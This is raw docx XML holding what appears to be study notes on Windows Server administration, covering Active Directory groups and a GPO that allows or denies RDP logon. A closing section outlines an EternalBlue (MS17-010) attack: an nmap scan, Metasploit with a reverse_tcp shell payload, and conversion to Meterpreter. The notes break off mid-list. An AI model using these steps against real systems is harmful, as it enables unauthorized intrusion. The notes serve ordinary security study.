      </w:r>
    </w:p>
    <w:p w14:paraId="79C42DAF" w14:textId="4FC4A4A7" w:rsidR="000C69ED" w:rsidRPr="0084205E" w:rsidRDefault="000C69ED" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>To assign user to a group</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45ED7734" w14:textId="1AE5B590" w:rsidR="000C69ED" w:rsidRPr="0084205E" w:rsidRDefault="000C69ED" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Right-click user &gt; add to a group</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="797317B2" w14:textId="7FEB9564" w:rsidR="000C69ED" w:rsidRPr="0084205E" w:rsidRDefault="000C69ED" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Prompt to search for object in AD</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BCF24BA" w14:textId="30E1BA2E" w:rsidR="000C69ED" w:rsidRPr="0084205E" w:rsidRDefault="000C69ED" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Enter object name to select</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EB03FB1" w14:textId="7CEA78F2" w:rsidR="000C69ED" w:rsidRPr="0084205E" w:rsidRDefault="000C69ED" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Check names</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A2EE69B" w14:textId="4C084EFE" w:rsidR="000C69ED" w:rsidRPr="0084205E" w:rsidRDefault="000C69ED" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>ok</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BBFF9CC" w14:textId="4B39A4F9" w:rsidR="000C69ED" w:rsidRPr="0084205E" w:rsidRDefault="000C69ED" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Or</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E25597E" w14:textId="75CB3E76" w:rsidR="000C69ED" w:rsidRPr="0084205E" w:rsidRDefault="000C69ED" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Double-click group &gt; Members &gt; Add</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11282D0E" w14:textId="6510989B" w:rsidR="000C69ED" w:rsidRPr="0084205E" w:rsidRDefault="000C69ED" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>To add group to another group</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48BB4E52" w14:textId="190186AE" w:rsidR="000C69ED" w:rsidRPr="0084205E" w:rsidRDefault="000C69ED" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Right click group &gt; add to a group and search &gt; OK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A9874D6" w14:textId="0DBFC7CE" w:rsidR="000C69ED" w:rsidRPr="0084205E" w:rsidRDefault="000C69ED" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Creating First GPO</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1160D54C" w14:textId="3D0A3C07" w:rsidR="00136A34" w:rsidRPr="0084205E" w:rsidRDefault="00136A34" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Adds additional controls to user accounts and computers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CADB946" w14:textId="40702D99" w:rsidR="00136A34" w:rsidRPr="0084205E" w:rsidRDefault="00136A34" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Local settings, site-wide settings, domain-level settings, and setting applied to OUs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A922272" w14:textId="68C09DFE" w:rsidR="00136A34" w:rsidRPr="0084205E" w:rsidRDefault="00136A34" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Creating GPO</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4079FC67" w14:textId="31A39335" w:rsidR="00136A34" w:rsidRPr="0084205E" w:rsidRDefault="00136A34" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Tools &gt; Group Policy Management inside Server Manager</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B533457" w14:textId="13386D15" w:rsidR="00136A34" w:rsidRPr="0084205E" w:rsidRDefault="00136A34" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Right click on Group Policy Object &gt; create new object</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76BD7B2B" w14:textId="2709F7C7" w:rsidR="00136A34" w:rsidRPr="0084205E" w:rsidRDefault="00136A34" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>To edit – right click &gt; Edit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44734A49" w14:textId="62C8627D" w:rsidR="00136A34" w:rsidRPr="0084205E" w:rsidRDefault="00136A34" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Policies &gt; Windows Settings &gt; Security Settings &gt; Local Policies &gt; Users Right Assignment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C774A99" w14:textId="2C337B18" w:rsidR="00136A34" w:rsidRPr="0084205E" w:rsidRDefault="00136A34" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Double click on “Allow log on through Remote Desktop Services”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E061558" w14:textId="4C9F7DE7" w:rsidR="00136A34" w:rsidRPr="0084205E" w:rsidRDefault="00136A34" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Select Define these policy settings &gt; add user or group &gt; browse</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DADE6AE" w14:textId="33761400" w:rsidR="00136A34" w:rsidRPr="0084205E" w:rsidRDefault="00136A34" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Search &gt; OK &gt; OK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53EA0DBB" w14:textId="764E722F" w:rsidR="00136A34" w:rsidRPr="0084205E" w:rsidRDefault="00136A34" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>To block a user or group from using RDP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A7F6DEF" w14:textId="20504345" w:rsidR="00136A34" w:rsidRPr="0084205E" w:rsidRDefault="00136A34" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Double click Deny Log on through Remote Desktop Services</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42316956" w14:textId="6537A709" w:rsidR="00136A34" w:rsidRPr="0084205E" w:rsidRDefault="00136A34" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Add group</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10C4C6DC" w14:textId="6CF02EA5" w:rsidR="00136A34" w:rsidRPr="0084205E" w:rsidRDefault="00136A34" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>To make policies apply, must link GPO to root of the domain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="553A6641" w14:textId="07DA570E" w:rsidR="00136A34" w:rsidRPr="0084205E" w:rsidRDefault="00136A34" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Right click on Domain Controllers OU &gt; Link an Existing GPO &gt; select GPO &gt; OK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E4A5E92" w14:textId="68EF9AEF" w:rsidR="00136A34" w:rsidRPr="0084205E" w:rsidRDefault="00136A34" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>To apply the GPO,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B17B0BE" w14:textId="1C267439" w:rsidR="00136A34" w:rsidRPr="0084205E" w:rsidRDefault="00136A34" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Open CMD as Admin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A455CA4" w14:textId="31AD0BBF" w:rsidR="006A18C3" w:rsidRPr="0084205E" w:rsidRDefault="006A18C3" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Type: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>gpupdate</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> /force</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56A8796C" w14:textId="36E72343" w:rsidR="006A18C3" w:rsidRPr="0084205E" w:rsidRDefault="006A18C3" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Testing the GPO</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C408B11" w14:textId="65011D8E" w:rsidR="006A18C3" w:rsidRPr="0084205E" w:rsidRDefault="006A18C3" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Test using logins and methods that have been OK’d or blocked</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76D7BAC2" w14:textId="37A7DE90" w:rsidR="002968A2" w:rsidRPr="0084205E" w:rsidRDefault="002968A2" w:rsidP="0084205E">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="051EFC9E" w14:textId="3759055F" w:rsidR="002968A2" w:rsidRPr="0084205E" w:rsidRDefault="00D24F28" w:rsidP="0084205E">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Windows and Eternal Blue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D2FDB49" w14:textId="7809052C" w:rsidR="00D24F28" w:rsidRPr="0084205E" w:rsidRDefault="00242FDB" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Run </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> scan – detect ms17-010 eternal blue vuln</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D187062" w14:textId="461D1931" w:rsidR="00242FDB" w:rsidRPr="0084205E" w:rsidRDefault="00242FDB" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>Msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4B7AA386" w14:textId="2DE5EA1F" w:rsidR="00242FDB" w:rsidRPr="0084205E" w:rsidRDefault="00242FDB" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Search, use, set required options and payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="685368BF" w14:textId="47D81A4E" w:rsidR="00242FDB" w:rsidRPr="0084205E" w:rsidRDefault="00242FDB" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Payload: windows/x64/shell/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>reverse_tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="487608FD" w14:textId="78389F1A" w:rsidR="00242FDB" w:rsidRPr="0084205E" w:rsidRDefault="00242FDB" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>DOS layout</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F3C9338" w14:textId="6C16C225" w:rsidR="00242FDB" w:rsidRPr="0084205E" w:rsidRDefault="00242FDB" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">To change to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="402301D3" w14:textId="243535D6" w:rsidR="00242FDB" w:rsidRPr="0084205E" w:rsidRDefault="00242FDB" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Background shell (CTRL + Z)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="285F17FA" w14:textId="04612735" w:rsidR="00242FDB" w:rsidRPr="0084205E" w:rsidRDefault="00242FDB" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">To convert shell to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> shell in Metasploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C258885" w14:textId="766B15C5" w:rsidR="00242FDB" w:rsidRPr="0084205E" w:rsidRDefault="00242FDB" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>“post/multi/manage/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>shell_to_meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="052F17A3" w14:textId="1A06E5CB" w:rsidR="00242FDB" w:rsidRPr="0084205E" w:rsidRDefault="00242FDB" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Use &gt; show options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15AA6056" w14:textId="6F194EAD" w:rsidR="00242FDB" w:rsidRPr="0084205E" w:rsidRDefault="00A1784C" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidR="00242FDB" w:rsidRPr="0084205E">
        <w:t>ession</w:t>
      </w:r>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>fill</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> in required</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38EC284D" w14:textId="269D22E7" w:rsidR="00A1784C" w:rsidRPr="0084205E" w:rsidRDefault="00A1784C" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>“sessions” command for active sessions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7550B069" w14:textId="73CF397B" w:rsidR="00A1784C" w:rsidRPr="0084205E" w:rsidRDefault="00A1784C" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
